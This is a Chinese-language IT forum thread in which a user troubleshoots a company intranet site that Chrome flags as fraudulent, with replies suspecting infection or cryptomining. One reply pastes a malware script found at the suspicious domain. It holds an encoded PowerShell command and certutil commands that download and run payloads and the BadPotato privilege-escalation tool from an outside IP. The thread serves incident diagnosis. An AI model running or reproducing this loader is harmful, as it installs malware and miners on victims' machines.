iT邦幫忙

2

公司內部網站進入(Chrome)出現"你要瀏覽的是詐騙網站"

zomb 2020-11-24 13:57:512590 瀏覽

公司內部網站進入使用HTTP
網址為HTTP://192.168.3.3
昨天使用者進入該網址時出現以下https://ithelp.ithome.com.tw/upload/images/20201124/200192836FYVz21g3A.jpg
小弟內部使用的網站沒有SSL,但搞不懂為何會出現WWW.tkcs123.tk 這個網站。這是Chrome誤判嗎?
已經有在此台主機進行掃毒,並沒有發現任何問題。
請問這是Chrome問題嗎?還是我需要使用SSL?
如果要用SSL,是否找單台SSL (免費)就可以了?

11/27 更新
已經將網站處理了,是被竄寫了。
非常謝謝各位大大協助與提供意見。

看更多先前的討論...收起先前的討論...
研判是擴充功能用到這個網站,或瀏覽器遭到綁架,或是DNS被綁架,或是hosts 被竄改
zomb iT邦新手 4 級 ‧ 2020-11-24 15:03:41 檢舉
謝謝japhenchen
在我繼續按下"仍然前往這個網站",一樣會正常進入192.168.3.3 的內部網站。所以dns 或hosts 應該沒有問題,更何況用的是ip位置。
另外chrome 開啟無痕模式,也會出現,也確認chrome沒有任何擴充插件。
tonny0531 iT邦新手 5 級 ‧ 2020-11-24 16:06:30 檢舉
有檢查過host table是否有這個IP的對應嗎?
有可能是先導到那個網址的IP 在重新導向到 192.168.3.3
zomb iT邦新手 4 級 ‧ 2020-11-24 16:48:02 檢舉
謝謝tony0531
已經檢查host文件中並無任何IP對應
snk iT邦新手 5 級 ‧ 2020-12-04 08:49:49 檢舉
請問是哪邊被竄寫呢 是否方便分享一下 ?
2
浩瀚星空
iT邦超人 1 級 ‧ 2020-11-24 17:15:26

比較擔心你的網站被掛馬了。
掃毒並不一定可以解決。

如果是單一個案的情況下。有時不是你網站的問題。
而是該名成員的電腦中毒了。

該台電腦有可能已經被掛入後門或是ad相關病毒。
(請不要說掃毒過了沒問題這樣的話)
造成自動轉頁的請求。

這個要解決很麻煩,建議重做系統會比較快處理。

總之,先確認是否個案問題。如果不是個案問題的話。你的頭就大了。
得查看你的伺服器了。
個案問題的話就比較不需要擔心了。

3
Franky Chen
iT邦研究生 4 級 ‧ 2020-11-25 08:17:23

www. t k c s 1 2 3.tkhttps://ithelp.ithome.com.tw/upload/images/20201125/20102395YbZFFcqaHe.jpg
有點恐怖ㄟ
感覺是某隻病毒之類的下載源

win.ps1

$check = Test-Path C:\Windows\temp\testxmr3.txt
if($check -eq "True"){
    echo ""
    }else{
cmd /c "echo 1 >> C:\Windows\temp\testxmr3.txt"
cmd /c start /b powershell -ENC DQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAbgAgAD0AIABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAbgBlAHQALgB3AGUAYgBjAGwAaQBlAG4AdAA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAG4ALgBwAHIAbwB4AHkAIAA9ACAAWwBOAGUAdAAuAFcAZQBiAFIAZQBxAHUAZQBzAHQAXQA6ADoARwBlAHQAUwB5AHMAdABlAG0AVwBlAGIAUAByAG8AeAB5ACgAKQA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAG4ALgBQAHIAbwB4AHkALgBDAHIAZQBkAGUAbgB0AGkAYQBsAHMAIAA9ACAAWwBOAGUAdAAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAQwBhAGMAaABlAF0AOgA6AEQAZQBmAGEAdQBsAHQAQwByAGUAZABlAG4AdABpAGEAbABzADsAIAAKAEkARQBYACAAJABuAC4ARABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADQANQAuADcANwAuADEANwA4AC4AMQA2ADkAOgA4ADAALwBwAG8AYwBwAGEAeQBsAG8AYQBkAC4AcABzADEAJwApAA==


certutil -urlcache -split -f http://45.77.178.169/smb.exe
certutil -urlcache -split -f http://45.77.178.169/Update.exe
certutil -urlcache -split -f http://45.77.178.169/BadPotato.exe
cmd.exe /c Badpotato.exe "cmd.exe /c Update.exe"
cmd.exe /c Badpotato.exe "cmd.exe /c smb.exe"
del smb.exe
del Update.exe
del Badpotato.exe
exit
}
Tree iT邦新手 5 級 ‧ 2020-11-25 16:11:49 檢舉

將 HFS 開到公網上做使用 , 伺服器上的檔案被看光光了 /images/emoticon/emoticon16.gif

0
雷伊
iT邦好手 1 級 ‧ 2020-11-25 09:37:54

試試...
1.點開Google Chrome
2.點擊右上角三個點圖示
3.點擊設定
4.拉到最下方選進階
5.拉到最下方倒數第二個,將設定還原成原始設定值

1
eigen
iT邦新手 1 級 ‧ 2020-11-25 11:41:08

比較有可能公司網頁原始碼中,被入侵,被寫入了 MMM . tkcs 123.tk

1
a030225033
iT邦新手 5 級 ‧ 2020-11-25 14:23:19

你這有可能是被人植入程式給別人挖礦了
1.確認是否為單一client有這個狀況還是全部cliet都是這樣
2.承上還是server端被感染
3.瀏覽器現在規定只要不是https都會被列為不安全的網站

zomb iT邦新手 4 級 ‧ 2020-11-25 14:46:43 檢舉

目前狀況是
1.SERVER 掃毒沒掃到,用ESET ONLINE SCANNER 掃也沒掃到。
2.CLIENT 有零星問題出現,並非全部。
3.只有用CHROME 會出現此問題。

Franky Chen iT邦研究生 4 級 ‧ 2020-11-26 10:22:49 檢舉

3.只有用CHROME 會出現此問題。
因為只有chrome會檢查這個

去開chrome f12找找看哪裡被植入 w w w . t k c s 1 2 3 . t k了
感覺是Server 端 source code 被植入

zomb iT邦新手 4 級 ‧ 2020-11-26 17:46:50 檢舉

感謝~檢查中
不過還請指導如何按F12找出

0
DennisLu
iT邦新手 5 級 ‧ 2020-11-26 17:41:18

檢查網站是不是被植入木馬,
看其他人推文的內容,
你可能注意是不是管轄下的PC或Server是不是已經在挖礦了

推文中有人查出的檔案 用檔名判斷 內容偏向挖礦XMR類的

挖礦不一定100% 現在挖礦很聰明,不會全速挖,

看到你叫系統的相關程式查看,還會躲起來暫時不挖。

看過雙CPU伺服器,被挖好幾年,我好心寫信告知也不處理的。

我要發表回答

立即登入回答